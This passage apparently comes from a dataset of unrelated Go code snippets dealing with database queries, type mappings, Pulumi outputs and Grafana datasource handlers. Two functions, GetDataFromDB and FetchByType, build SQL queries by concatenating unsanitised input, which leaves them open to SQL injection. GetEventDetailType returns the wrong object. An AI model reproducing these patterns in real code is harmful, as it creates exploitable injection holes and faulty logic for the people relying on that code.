valid\")\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\n\t\t\t\t\tfilterFields := []*data.Field{}\n\n\t\t\t\t\t// Filter fields\n\t\t\t\t\tfor _, field := range frame.Fields {\n\t\t\t\t\t\t_, found := Find(fields, field.Name)\n\n\t\t\t\t\t\tif !found {\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t}\n\t\t\t\t\t\tfilterFields = append(filterFields, field)\n\t\t\t\t\t}\n\t\t\t\t\tframe.Fields = append([]*data.Field{data.NewField(\"#time\", nil, timeValues)}, filterFields...)\n\t\t\t\t} else {\n\t\t\t\t\tframe.Fields = append([]*data.Field{data.NewField(\"#time\", nil, timeValues)}, frame.Fields...)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// save the response in a hashmap based on with RefID as identifier\n\t\tresponse.Responses[q.RefID] = resp\n\t}\n\n\treturn response, nil\n}", "func getQueryField(r *http.Request, fieldName string) (value string, err error) {\n\tquery := r.URL.Query()\n\tdataTypeArray, ok := query[fieldName]\n\n\tif !ok {\n\t\terr = fmt.Errorf(\"Field %s not found\", fieldName)\n\t\treturn\n\t}\n\n\tif len(dataTypeArray) == 0 {\n\t\terr = fmt.Errorf(\"Field %s not found\", fieldName)\n\t\treturn\n\t}\n\n\tvalue = dataTypeArray[0]\n\tif value == \"\" {\n\t\terr = fmt.Errorf(\"Field %s is empty\", fieldName)\n\t\treturn\n\t}\n\n\treturn\n}", "func (pg *PostgresRepo) GetDataFromDB(keyword string, requestType string) ([]DataFromDB, error) {\n\tquery := `\n\t\tSELECT\n\t\t\tdistribution.place, product.name, distributor.name, distribution.quantity_sold, distribution.product_id, distribution.distributor_id\n\t\tFROM \n\t\t\tdistribution\n\t\tINNER JOIN \n\t\t\tproduct\n\t\tON\n\t\t\tproduct.id = distribution.product_id\n\t\tINNER JOIN \n\t\t\tdistributor\n\t\tON \n\t\t\tdistributor.id = distribution.distributor_id\n\t\t%s\n\t`\n\tvar whereQuery string\n\tif len(keyword) > 0 {\n\t\tif requestType == \"area\" {\n\t\t\twhereQuery = `WHERE distribution.place ILIKE '` + keyword + `'`\n\t\t} else if requestType == \"product\" {\n\t\t\twhereQuery = `WHERE product.name ILIKE '` + keyword + `'`\n\t\t} else if requestType == \"distributor\" {\n\t\t\twhereQuery = `WHERE distributor.name ILIKE '` + keyword + `'`\n\t\t}\n\t} else {\n\t\twhereQuery = ``\n\t}\n\tquery = fmt.Sprintf(query, whereQuery)\n\trows, err := pg.DB.Query(query)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar data []DataFromDB\n\tvar singleData DataFromDB\n\tfor rows.Next() {\n\t\terr := rows.Scan(&singleData.Place, &singleData.ProductName, &singleData.DistributorName, &singleData.Quantity, &singleData.ProductID, &singleData.DistributorID)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tdata = append(data, singleData)\n\t}\n\treturn data, nil\n}", "func (JSONMap) GormDBDataType(db *gorm.DB, field *schema.Field) string {\n\tswitch db.Dialector.Name() {\n\tcase \"sqlite\":\n\t\treturn \"JSON\"\n\tcase \"mysql\":\n\t\treturn \"JSON\"\n\tcase \"postgres\":\n\t\treturn \"JSONB\"\n\tcase \"sqlserver\":\n\t\treturn \"NVARCHAR(MAX)\"\n\t}\n\treturn \"\"\n}", "func (o IndexesResponseOutput) DataType() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v IndexesResponse) *string { return v.DataType }).(pulumi.StringPtrOutput)\n}", "func (p *GetField) Type() sql.Type {\n\treturn p.fieldType\n}", "func (t systemIntType) Type() query.Type {\n\treturn sqltypes.Int64\n}", "func (t systemIntType) Type() query.Type {\n\treturn sqltypes.Int64\n}", "func (fn NoArgFunc) Type() Type { return fn.SQLType }", "func (o ApiOperationRequestQueryParameterOutput) Type() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ApiOperationRequestQueryParameter) string { return v.Type }).(pulumi.StringOutput)\n}", "func TypeToString(dsType Type) string {\n\tswitch dsType {\n\tcase Database:\n\t\treturn \"database\"\n\tcase File:\n\t\treturn \"file\"\n\t}\n\n\treturn \"Unknown\" // We will never arrive here\n}", "func (c *MedicineTypeClient) Query() *MedicineTypeQuery {\n\treturn &MedicineTypeQuery{config: c.config}\n}", "func (DataFrame) Type() string { return fmt.Sprintf(\"%s.DataFrame\", Name) }", "func (fdq *FurnitureDetailQuery) QueryTypes() *FurnitureTypeQuery {\n\tquery := &FurnitureTypeQuery{config: fdq.config}\n\tquery.path = func(ctx context.Context) (fromU *sql.Selector, err error) {\n\t\tif err := fdq.prepareQuery(ctx); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tstep := sqlgraph.NewStep(\n\t\t\tsqlgraph.From(furnituredetail.Table, furnituredetail.FieldID, fdq.sqlQuery()),\n\t\t\tsqlgraph.To(furnituretype.Table, furnituretype.FieldID),\n\t\t\tsqlgraph.Edge(sqlgraph.M2O, true, furnituredetail.TypesTable, furnituredetail.TypesColumn),\n\t\t)\n\t\tfromU = sqlgraph.SetNeighbors(fdq.driver.Dialect(), step)\n\t\treturn fromU, nil\n\t}\n\treturn query\n}", "func getSqlBuilderColumnType(columnMetaData metadata.Column) string {\n\tif columnMetaData.DataType.Kind != metadata.BaseType {\n\t\treturn \"String\"\n\t}\n\n\tswitch strings.ToLower(columnMetaData.DataType.Name) {\n\tcase \"boolean\":\n\t\treturn \"Bool\"\n\tcase \"smallint\", \"integer\", \"bigint\",\n\t\t\"tinyint\", \"mediumint\", \"int\", \"year\": //MySQL\n\t\treturn \"Integer\"\n\tcase \"date\":\n\t\treturn \"Date\"\n\tcase \"timestamp without time zone\",\n\t\t\"timestamp\", \"datetime\": //MySQL:\n\t\treturn \"Timestamp\"\n\tcase \"timestamp with time zone\":\n\t\treturn \"Timestampz\"\n\tcase \"time without time zone\",\n\t\t\"time\": //MySQL\n\t\treturn \"Time\"\n\tcase \"time with time zone\":\n\t\treturn \"Timez\"\n\tcase \"interval\":\n\t\treturn \"Interval\"\n\tcase \"user-defined\", \"enum\", \"text\", \"character\", \"character varying\", \"bytea\", \"uuid\",\n\t\t\"tsvector\", \"bit\", \"bit varying\", \"money\", \"json\", \"jsonb\", \"xml\", \"point\", \"line\", \"ARRAY\",\n\t\t\"char\", \"varchar\", \"nvarchar\", \"binary\", \"varbinary\",\n\t\t\"tinyblob\", \"blob\", \"mediumblob\", \"longblob\", \"tinytext\", \"mediumtext\", \"longtext\": // MySQL\n\t\treturn \"String\"\n\tcase \"real\", \"numeric\", \"decimal\", \"double precision\", \"float\",\n\t\t\"double\": // MySQL\n\t\treturn \"Float\"\n\tdefault:\n\t\tfmt.Println(\"- [SQL Builder] Unsupported sql column '\" + columnMetaData.Name + \" \" + columnMetaData.DataType.Name + \"', using StringColumn instead.\")\n\t\treturn \"String\"\n\t}\n}", "func (c InfluxDBClient) FetchByType(eventType string, start int64, end int64) ([]EventModel, error) {\n\tlog.Printf(\"Fetch events by type %s and from now - %ds to now - %ds\", eventType, start, end)\n\n\tcmd := fmt.Sprintf(`SELECT * FROM %s\n\t\t\t\t\t\tWHERE event_type='%s'\n\t\t\t\t\t\t\t\tAND time >= NOW() - %ds\n\t\t\t\t\t\t\t\tAND time <= NOW() - %ds`, eventsTableName, eventType, start, end)\n\n\tlog.Println(\"Query data with command\", cmd)\n\n\tresponse, err := c.queryDB(cmd)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn c.parseResponse(response)\n}", "func TypeGetQdata(type_ Type, quark glib.Quark) uintptr {\n\tc_type := (C.GType)(type_)\n\n\tc_quark := (C.GQuark)(quark)\n\n\tretC := C.g_type_get_qdata(c_type, c_quark)\n\tretGo := (uintptr)(unsafe.Pointer(retC))\n\n\treturn retGo\n}", "func (msg *GlobalLockQueryResponse) Type() uint16 {\n\treturn TypeGlobalLockQueryResult\n}", "func (o ServiceResponseOutput) DatabaseType() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ServiceResponse) string { return v.DatabaseType }).(pulumi.StringOutput)\n}", "func kindFromDBTypeName(log lg.Log, colName, dbTypeName string) kind.Kind {\n\tvar knd kind.Kind\n\tdbTypeName = strings.ToUpper(dbTypeName)\n\n\t// Given variations such as VARCHAR(255), we first trim the parens\n\t// parts. Thus VARCHAR(255) becomes VARCHAR.\n\ti := strings.IndexRune(dbTypeName, '(')\n\tif i > 0 {\n\t\tdbTypeName = dbTypeName[0:i]\n\t}\n\n\tswitch dbTypeName {\n\tdefault:\n\t\tlog.Warnf(\"Unknown MySQL database type %q for column %q: using %q\", dbTypeName, colName, kind.Unknown)\n\t\tknd = kind.Unknown\n\tcase \"\":\n\t\tknd = kind.Unknown\n\tcase \"INTEGER\", \"INT\", \"TINYINT\", \"SMALLINT\", \"MEDIUMINT\", \"BIGINT\", \"YEAR\", \"BIT\":\n\t\tknd = kind.Int\n\tcase \"DECIMAL\", \"NUMERIC\":\n\t\tknd = kind.Decimal\n\tcase \"CHAR\", \"VARCHAR\", \"TEXT\", \"TINYTEXT\", \"MEDIUMTEXT\", \"LONGTEXT\":\n\t\tknd = kind.Text\n\tcase \"ENUM\", \"SET\":\n\t\tknd = kind.Text\n\tcase \"JSON\":\n\t\tknd = kind.Text\n\tcase \"VARBINARY\", \"BINARY\", \"BLOB\", \"MEDIUMBLOB\", \"LONGBLOB\", \"TINYBLOB\":\n\t\tknd = kind.Bytes\n\tcase \"DATETIME\", \"TIMESTAMP\":\n\t\tknd = kind.Datetime\n\tcase \"DATE\":\n\t\tknd = kind.Date\n\tcase \"TIME\":\n\t\tknd = kind.Time\n\tcase \"FLOAT\", \"DOUBLE\", \"DOUBLE PRECISION\", \"REAL\":\n\t\tknd = kind.Float\n\tcase \"BOOL\", \"BOOLEAN\":\n\t\t// In practice these are not returned by the mysql driver.\n\t\tknd = kind.Bool\n\t}\n\n\treturn knd\n}", "func queryData(ctx sdk.Context, k Keeper, req abci.RequestQuery) ([]byte, error) {\n\tvar params types.QueryStorageParams\n\n\tif err := types.ModuleCdc.UnmarshalJSON(req.Data, &params); err != nil {\n\t\treturn nil, sdkerrors.Wrap(sdkerrors.ErrJSONUnmarshal, err.Error())\n\t}\n\n\tdata := k.GetData(ctx, params.Address)\n\n\tres := types.NewQueryStorageDataRes(b64.StdEncoding.EncodeToString(data))\n\n\tbz, err := codec.MarshalJSONIndent(types.ModuleCdc, res)\n\tif err != nil {\n\t\treturn nil, sdkerrors.Wrap(sdkerrors.ErrJSONMarshal, err.Error())\n\t}\n\n\treturn bz, nil\n}", "func (*CallbackQueryPayloadDataWithPassword) TypeName() string {\n\treturn \"callbackQueryPayloadDataWithPassword\"\n}", "func getFilter(operation string, parameter string, valueString string, dataType string) (filter bson.D, err error) {\n\tif dataType == \"float\" {\n\t\t//raise an error if the value cannot be converted to a float\n\t\tvalue, err := strconv.ParseFloat(valueString, 64)\n\t\tif err != nil {\n\t\t\treturn nil, errors.New(\"The given value could not be parsed to a decimal\")\n\t\t}\n\n\t\tfilter = bson.D{{\n\t\t\tparameter, bson.D{{\n\t\t\t\toperation, value,\n\t\t\t}},\n\t\t}}\n\t} else {\n\t\tfilter = bson.D{{\n\t\t\tparameter, bson.D{{\n\t\t\t\toperation, valueString,\n\t\t\t}},\n\t\t}}\n\t}\n\treturn\n}", "func (m *SchemaData) Query(query string, args ...interface{}) (*sql.Rows, error) {\n\tlog.Println(\"[SQL]\", \"[\"+m.dbType+\"]\", query, args)\n\treturn nil, nil\n}", "func (q QueryFunc) ReturnType() string {\n\tnm := q.Output.Name\n\tif q.IsList {\n\t\treturn \"[]\" + nm\n\t}\n\treturn \"*\" + nm\n}", "func (td *SampleDatasource) QueryData(ctx context.Context, req *backend.QueryDataRequest) (*backend.QueryDataResponse, error) {\n\tlog.DefaultLogger.Info(\"QueryData\", \"request\", req)\n\n\t// create response struct\n\tresponse := backend.NewQueryDataResponse()\n\n instance, err := td.im.Get(req.PluginContext)\n if err != nil {\n return nil, err\n }\n instSetting, _ := instance.(*instanceSettings)\n\n\t// loop over queries and execute them individually.\n\tfor _, q := range req.Queries {\n\t\tres := td.query(ctx, q, instSetting)\n\n\t\t// save the response in a hashmap\n\t\t// based on with RefID as identifier\n\t\tresponse.Responses[q.RefID] = res\n\t}\n\n\treturn response, nil\n}", "func (q *Query) InType() interface{} {\n\tswitch q.AnswerType {\n\tcase \"int\":\n\t\tresult, _ := strconv.Atoi(q.Answer)\n\t\treturn result\n\tcase \"string\":\n\t\treturn q.Answer\n\tcase \"float\":\n\t\tresult, _ := strconv.ParseFloat(q.Answer, 32)\n\t\treturn result\n\tdefault:\n\t\treturn q.Answer\n\t}\n}", "func commandType(str string) cmdType {\n\n\tif str == \"newanimal\" {\n\t\treturn newAnimal\n\t}\n\treturn query\n\n}", "func (c *Client) DataType(datatype string) (*Client, error) {\n\t// validate input\n\tswitch datatype {\n\t// default\n\tcase \"json\":\n\tcase \"csv\":\n\tdefault:\n\t\t// throw error\n\t\tmsg := fmt.Sprintf(\"Invalid response format requested: %s.\\n\", datatype)\n\t\treturn nil, errors.New(msg)\n\t}\n\t// add to receiver\n\tc.datatype = &datatype\n\treturn c, nil\n}", "func (database *SqlDatabase) GetType() string {\n\treturn \"Microsoft.DocumentDB/databaseAccounts/sqlDatabases\"\n}", "func Test_query(t *testing.T) {\n\tclient := &FakeClient{}\n\tds := &PhlareDatasource{\n\t\tclient: client,\n\t}\n\n\tpCtx := backend.PluginContext{\n\t\tDataSourceInstanceSettings: &backend.DataSourceInstanceSettings{\n\t\t\tJSONData: []byte(`{\"minStep\":\"30s\"}`),\n\t\t},\n\t}\n\n\tt.Run(\"query both\", func(t *testing.T) {\n\t\tdataQuery := makeDataQuery()\n\t\tresp := ds.query(context.Background(), pCtx, *dataQuery)\n\t\trequire.Nil(t, resp.Error)\n\t\trequire.Equal(t, 2, len(resp.Frames))\n\n\t\t// The order of the frames is not guaranteed, so we normalize it\n\t\tif resp.Frames[0].Fields[0].Name == \"level\" {\n\t\t\tresp.Frames[1], resp.Frames[0] = resp.Frames[0], resp.Frames[1]\n\t\t}\n\n\t\trequire.Equal(t, \"time\", resp.Frames[0].Fields[0].Name)\n\t\trequire.Equal(t, data.NewField(\"level\", nil, []int64{0, 1, 2}), resp.Frames[1].Fields[0])\n\t})\n\n\tt.Run(\"query profile\", func(t *testing.T) {\n\t\tdataQuery := makeDataQuery()\n\t\tdataQuery.QueryType = queryTypeProfile\n\t\tresp := ds.query(context.Background(), pCtx, *dataQuery)\n\t\trequire.Nil(t, resp.Error)\n\t\trequire.Equal(t, 1, len(resp.Frames))\n\t\trequire.Equal(t, data.NewField(\"level\", nil, []int64{0, 1, 2}), resp.Frames[0].Fields[0])\n\t})\n\n\tt.Run(\"query metrics\", func(t *testing.T) {\n\t\tdataQuery := makeDataQuery()\n\t\tdataQuery.QueryType = queryTypeMetrics\n\t\tresp := ds.query(context.Background(), pCtx, *dataQuery)\n\t\trequire.Nil(t, resp.Error)\n\t\trequire.Equal(t, 1, len(resp.Frames))\n\t\trequire.Equal(t, \"time\", resp.Frames[0].Fields[0].Name)\n\t})\n\n\tt.Run(\"query metrics uses min step\", func(t *testing.T) {\n\t\tdataQuery := makeDataQuery()\n\t\tdataQuery.QueryType = queryTypeMetrics\n\t\tresp := ds.query(context.Background(), pCtx, *dataQuery)\n\t\trequire.Nil(t, resp.Error)\n\t\tstep, ok := client.Args[5].(float64)\n\t\trequire.True(t, ok)\n\t\trequire.Equal(t, float64(30), step)\n\t})\n\n\tt.Run(\"query metrics uses default min step\", func(t *testing.T) {\n\t\tdataQuery := makeDataQuery()\n\t\tdataQuery.QueryType = queryTypeMetrics\n\t\tpCtxNoMinStep := backend.PluginContext{\n\t\t\tDataSourceInstanceSettings: &backend.DataSourceInstanceSettings{\n\t\t\t\tJSONData: []byte(`{}`),\n\t\t\t},\n\t\t}\n\t\tresp := ds.query(context.Background(), pCtxNoMinStep, *dataQuery)\n\t\trequire.Nil(t, resp.Error)\n\t\tstep, ok := client.Args[5].(float64)\n\t\trequire.True(t, ok)\n\t\trequire.Equal(t, float64(15), step)\n\t})\n\n\tt.Run(\"query metrics uses group by\", func(t *testing.T) {\n\t\tdataQuery := makeDataQuery()\n\t\tdataQuery.QueryType = queryTypeMetrics\n\t\tdataQuery.JSON = []byte(`{\"profileTypeId\":\"memory:alloc_objects:count:space:bytes\",\"labelSelector\":\"{app=\\\\\\\"baz\\\\\\\"}\",\"groupBy\":[\"app\",\"instance\"]}`)\n\t\tresp := ds.query(context.Background(), pCtx, *dataQuery)\n\t\trequire.Nil(t, resp.Error)\n\t\tgroupBy, ok := client.Args[4].([]string)\n\t\trequire.True(t, ok)\n\t\trequire.Equal(t, []string{\"app\", \"instance\"}, groupBy)\n\t})\n}", "func control_data_type(w http.ResponseWriter, r *http.Request) {\n \n //ADMIN\n checkAdmin(w,r)\n\n //CONTEXT\n c := appengine.NewContext(r)\n\n /*******************************GET LIST/ADD**************************/\n if r.Method == \"GET\"{\n \n //DATA\n data := map[string]string{\n \"get\":\"true\",\n \"title\": \"Data\",\n } \n\n\n //QUERY\n q := datastore.NewQuery(\"DataType\").Limit(100)\n\n\n //DB GET ALL\n var db []*DataType\n keys,err := q.GetAll(c,&db)\n\n //DB ERR\n if err != nil {\n fmt.Fprint(w,\"error getting items\")\n return\n }\n\n //VAR\n var dbData []map[string]string\n\n //FOR DB ITEMS\n for i := range db {\n \n //KEYS ENCODE\n k := keys[i].Encode()\n\n dbData = append(dbData,\n map[string]string {\n \"title\": db[i].Title,\n \"key\": k,\n //\"fieldNames\": db[i].Fields[1].Name,\n //\"fieldUI\":db[i].UI,\n /*Fields: map[string]string{\n \"Name\":\"text\",\n \"Email\":\"text\",\n \"Phone\":\"text\",\n \"Message\":\"textarea\", \n },*/\n\n\n },\n )\n }\n\n \n//fmt.Fprintln(w,data)\n//fmt.Fprintln(w,dbData)\n//fmt.Fprintln(w,r.Header.Get(\"X-Requested-With\")) //\"X-Requested-With\"\n\nif r.Header.Get(\"X-Requested-With\") != \"\" {\n\n //MARSHAL JSON\n j,errJSON := json.Marshal(dbData)\n if errJSON != nil {\n fmt.Fprintln(w,\"error with JSON\")\n }\n\n //SET CONTENT-TYPE\n w.Header().Set(\"Content-Type\", \"application/json\")\n\n //DISPLAY JSON\n fmt.Fprint(w,string(j))\n \n} else {\n renderControl(w, r, \"/control/data.html\", data, dbData)\n}\n \n\n\n/********************************POST ADD*********************************/\n} else {\n\n\n //GET FORM VALS\n formVal := func(val string)string{\n return r.FormValue(val)\n }\n\n //newFields := map[string]string {}\n \n //fmt.Fprintln(w,r)\n\n TheFields := []FieldType {}\n FieldCount,_ := strconv.Atoi(formVal(\"field_count\"))\n FieldCount = FieldCount - 1\n \n for i := 0; i <= FieldCount; i++ {\n\n iCount := strconv.Itoa(i)\n\n TheFields = append(TheFields, FieldType {\n Name: formVal(\"fieldName\" + iCount),\n Order: formVal(\"fieldOrder\" + iCount),\n UI: formVal(\"fieldUI\" + iCount),\n //Errors: formVal(\"fieldErrors\" + iCount),\n })\n\n //fmt.Fprintln(w,formVal(\"fieldName\" + iCount))\n //fmt.Fprintln(w,formVal(\"fieldName0\"))\n //fmt.Fprintln(w, FieldCount)\n //fmt.Fprintln(w,iCount)\n }\n\n\n\n \n \n/*\n {\n Name: formVal(\"fieldName1\"),\n Label: formVal(\"fieldLabel1\"),\n UI: formVal(\"fieldUI1\"),\n Errors: formVal(\"fieldErrors1\"),\n },\n {\n Name: formVal(\"fieldName2\"),\n Label: formVal(\"fieldLabel2\"),\n UI: formVal(\"fieldUI2\"),\n Errors: formVal(\"fieldErrors2\"),\n },\n }*/\n\n\n //PRETTIFY URL\n reg, err := regexp.Compile(\"[^A-Za-z0-9]+\")\n \n if err != nil {\n fmt.Fprintln(w,\"error with RegX\")\n }\n \n prettyurl := reg.ReplaceAllString(formVal(\"slug\"), \"-\")\n prettyurl = strings.ToLower(strings.Trim(prettyurl, \"-\"))\n\n\n //fmt.Fprintln(w,prettyurl)\n\n\n\n //MAP FORM VALS\n newType := DataType {\n Title: formVal(\"typeName\"),\n TemplateList: formVal(\"data_type_template_list\"),\n TemplateItem: formVal(\"data_type_template_item\"),\n Description: formVal(\"description\"),\n Keywords: formVal(\"keywords\"),\n URL: prettyurl,\n Fields: TheFields,\n \n }\n\n //fmt.Fprintln(w,newType)\n\n\n //DB PUT\n key, err := datastore.Put(c, datastore.NewIncompleteKey(c, \"DataType\", nil), &newType)\n \n //IF ERRORS\n if err != nil {\n fmt.Fprint(w,\"error adding\")\n return\n\n //NO ERRORS\n } else {\n\n \n cacheFlush(\"types\",r)\n\n //DEBUG\n //fmt.Fprintln(w,\"added successfully\")\n //fmt.Fprintln(w,\"key: \" + key.Encode())\n\n \n //PREP JSON\n m := map[string]string{\n \"message\":\"new type added\",\n \"key\":key.Encode(),\n \"title\":newType.Title,\n \"adminSlug\":AdminSlug,\n } \n\n //MARSHAL JSON\n j,errJSON := json.Marshal(m)\n if errJSON != nil {\n fmt.Fprintln(w,\"error with JSON\")\n }\n\n //DISPLAY JSON\n w.Header().Set(\"Content-Type\", \"application/json\")\n fmt.Fprint(w,string(j))\n return\n \n \n //END ERRORS\n }\n \n\n //END POST\n }\n \n//END FUNC\n}", "func (msg *GlobalLockQueryRequest) Type() uint16 {\n\treturn TypeGlobalLockQuery\n}", "func (c CredentialDatabase) GetType() string {\n\treturn c.Type\n}", "func (o AzureOperationalStoreParametersResponseOutput) DataStoreType() pulumi.StringOutput {\n\treturn o.ApplyT(func(v AzureOperationalStoreParametersResponse) string { return v.DataStoreType }).(pulumi.StringOutput)\n}", "func GetEventDetailType() *graphql.Object{\n if detailEventType == nil{\n detailEventType = graphql.NewObject(graphql.ObjectConfig{\n Name: \"DetailEventType\",\n Fields: graphql.Fields{\n \"id\": &graphql.Field{\n Type:graphql.Int,\n },\n \"headerId\": &graphql.Field{\n Type:graphql.Int,\n },\n \"entertainmentTicketId\": &graphql.Field{\n Type:graphql.Int,\n },\n \"entertainmentTicket\": &graphql.Field{\n Type: GetEntertainmentTicketType(),\n },\n \"quantity\": &graphql.Field{\n Type:graphql.Int,\n },\n \"type\": &graphql.Field{\n Type:graphql.String,\n },\n },\n })\n }\n return entertainmentTicketType\n}", "func (c *UsertypeClient) Query() *UsertypeQuery {\n\treturn &UsertypeQuery{config: c.config}\n}", "func (t *StringDataType) Type() interface{} {\n\treturn \"\"\n}", "func popTypeMeta(db *sql.DB, arg_type string) (u PgColumnMetadata, err error) {\n\n\tq := `\nSELECT pg_catalog.format_type ( oid, null ) AS data_type,\n typname AS type_name,\n typcategory AS type_category\n FROM pg_catalog.pg_type\n WHERE oid::text = $1\n`\n\n\trows, err := db.Query(q, arg_type)\n\tif err != nil {\n\t\treturn\n\t}\n\tdefer rows.Close()\n\n\tfor rows.Next() {\n\n\t\terr = rows.Scan(&u.DataType,\n\t\t\t&u.TypeName,\n\t\t\t&u.TypeCategory,\n\t\t)\n\n\t}\n\n\treturn\n}", "func (qs DaytypeQS) QueryId(c *models.PositionalCounter) (string, []interface{}) {\n\ts, p := qs.whereClause(c)\n\n\treturn `SELECT \"id\" FROM \"heatcontrol_daytype\"` + s, p\n}", "func whatTable(dataType string) (table string, err error) {\n\tswitch dataType {\n\tcase \"dfp\", \"BPA\", \"BPP\", \"DRE\", \"DFC_MD\", \"DFC_MI\", \"DVA\":\n\t\ttable = \"dfp\"\n\tcase \"itr\", \"BPA_ITR\", \"BPP_ITR\", \"DRE_ITR\", \"DFC_MD_ITR\", \"DFC_MI_ITR\", \"DVA_ITR\":\n\t\ttable = \"itr\"\n\tcase \"fre\", \"FRE\":\n\t\ttable = \"fre\"\n\tcase \"codes\", \"CODES\":\n\t\ttable = \"codes\"\n\tcase \"md5\", \"MD5\":\n\t\ttable = \"md5\"\n\tcase \"status\", \"STATUS\":\n\t\ttable = \"status\"\n\tcase \"companies\", \"COMPANIES\":\n\t\ttable = \"companies\"\n\tcase \"fii_details\":\n\t\ttable = dataType\n\tcase \"fii_dividends\":\n\t\ttable = dataType\n\tcase \"stock_codes\":\n\t\ttable = dataType\n\tcase \"stock_quotes\":\n\t\ttable = dataType\n\tdefault:\n\t\treturn \"\", errors.Wrapf(err, \"tipo de informação inexistente: %s\", dataType)\n\t}\n\n\treturn\n}", "func (Instr) Type() sql.Type { return sql.Int64 }", "func replyDataType(reply interface{}, err error) (dt DataType, outputErr error) {\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tswitch reply := reply.(type) {\n\tcase string:\n\t\tswitch reply {\n\t\tcase \"FLOAT\":\n\t\t\tdt = TypeFloat\n\t\tcase \"DOUBLE\":\n\t\t\tdt = TypeDouble\n\t\tcase \"INT8\":\n\t\t\tdt = TypeInt8\n\t\tcase \"INT16\":\n\t\t\tdt = TypeInt16\n\t\tcase \"INT32\":\n\t\t\tdt = TypeInt32\n\t\tcase \"INT64\":\n\t\t\tdt = TypeInt64\n\t\tcase \"UINT8\":\n\t\t\tdt = TypeUint8\n\t\tcase \"UINT16\":\n\t\t\tdt = TypeUint16\n\t\t}\n\t\treturn dt, nil\n\tcase nil:\n\t\treturn \"\", ErrNil\n\n\t}\n\treturn \"\", fmt.Errorf(\"redisai-go: unexpected type for replyDataType, got type %T\", reply)\n}", "func (s *Service) SearchByType(c context.Context, mid, zoneid int64, mobiApp, device, platform, buvid, sType, keyword, filtered, order string, plat int8, build, highlight, categoryID, userType, orderSort, pn, ps int, old bool, now time.Time) (res *search.TypeSearch, err error) {\n\tswitch sType {\n\tcase \"season\":\n\t\tif res, err = s.srchDao.Season(c, mid, zoneid, keyword, mobiApp, device, platform, buvid, filtered, plat, build, pn, ps, now); err != nil {\n\t\t\treturn\n\t\t}\n\tcase \"upper\":\n\t\tif res, err = s.upper(c, mid, keyword, mobiApp, device, platform, buvid, filtered, order, s.biliUserVideoLimit, highlight, build, userType, orderSort, pn, ps, old, now); err != nil {\n\t\t\treturn\n\t\t}\n\tcase \"movie\":\n\t\tif !model.IsOverseas(plat) {\n\t\t\tif res, err = s.srchDao.MovieByType(c, mid, zoneid, keyword, mobiApp, device, platform, buvid, filtered, plat, build, pn, ps, now); err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\tcase \"live_room\", \"live_user\":\n\t\tif res, err = s.srchDao.LiveByType(c, mid, zoneid, keyword, mobiApp, device, platform, buvid, filtered, order, sType, plat, build, pn, ps, now); err != nil {\n\t\t\treturn\n\t\t}\n\tcase \"article\":\n\t\tif res, err = s.article(c, mid, zoneid, highlight, keyword, mobiApp, device, platform, buvid, filtered, order, sType, plat, categoryID, build, pn, ps, now); err != nil {\n\t\t\treturn\n\t\t}\n\tcase \"season2\":\n\t\tif (model.IsAndroid(plat) && build <= s.c.SearchBuildLimit.PGCHighLightAndroid) || (model.IsIOS(plat) && build <= s.c.SearchBuildLimit.PGCHighLightIOS) {\n\t\t\thighlight = 0\n\t\t}\n\t\tif res, err = s.srchDao.Season2(c, mid, keyword, mobiApp, device, platform, buvid, highlight, build, pn, ps); err != nil {\n\t\t\treturn\n\t\t}\n\tcase \"movie2\":\n\t\tif !model.IsOverseas(plat) {\n\t\t\tif (model.IsAndroid(plat) && build <= s.c.SearchBuildLimit.PGCHighLightAndroid) || (model.IsIOS(plat) && build <= s.c.SearchBuildLimit.PGCHighLightIOS) {\n\t\t\t\thighlight = 0\n\t\t\t}\n\t\t\tif res, err = s.srchDao.MovieByType2(c, mid, keyword, mobiApp, device, platform, buvid, highlight, build, pn, ps); err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\tcase \"tag\":\n\t\tif res, err = s.channel(c, mid, keyword, mobiApp, platform, buvid, device, order, sType, build, pn, ps, highlight); err != nil {\n\t\t\treturn\n\t\t}\n\tcase \"video\":\n\t\tif res, err = s.srchDao.Video(c, mid, keyword, mobiApp, device, platform, buvid, highlight, build, pn, ps); err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\tif res == nil {\n\t\tres = &search.TypeSearch{Items: []*search.Item{}}\n\t}\n\treturn\n}", "func (o IndexesOutput) DataType() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v Indexes) *string { return v.DataType }).(pulumi.StringPtrOutput)\n}", "func (m *NetflowQoSReportTableRow) DataType() string {\n\treturn \"qosReportTableRow\"\n}", "func (o DocumentDbOutputDataSourceResponseOutput) Type() pulumi.StringOutput {\n\treturn o.ApplyT(func(v DocumentDbOutputDataSourceResponse) string { return v.Type }).(pulumi.StringOutput)\n}", "func (o *Source) Type(exec boil.Executor, mods ...qm.QueryMod) sourceTypeQuery {\n\tqueryMods := []qm.QueryMod{\n\t\tqm.Where(\"id=?\", o.TypeID),\n\t}\n\n\tqueryMods = append(queryMods, mods...)\n\n\tquery := SourceTypes(exec, queryMods...)\n\tqueries.SetFrom(query.Query, \"\\\"source_types\\\"\")\n\n\treturn query\n}", "func (d *CatalogNodesQuery) Type() Type {\n\treturn TypeConsul\n}", "func (t DataType) DatabaseTypeName(version *hdb.Version, dfv int) string {\n\tswitch {\n\tcase t == DtSmalldecimal:\n\t\treturn databaseTypeNames[DtDecimal]\n\tcase t == DtShorttext && dfv < dfvLevel3:\n\t\treturn databaseTypeNames[DtNVarchar]\n\tcase t == DtAlphanum && dfv < dfvLevel3:\n\t\treturn databaseTypeNames[DtNVarchar]\n\tcase t == DtDate && dfv >= dfvLevel3:\n\t\treturn databaseTypeNames[DtDaydate]\n\tcase t == DtTime && dfv >= dfvLevel3:\n\t\treturn databaseTypeNames[DtSecondtime]\n\tcase t == DtTimestamp && dfv >= dfvLevel3:\n\t\treturn databaseTypeNames[DtLongdate]\n\tcase t == DtLongdate && dfv < 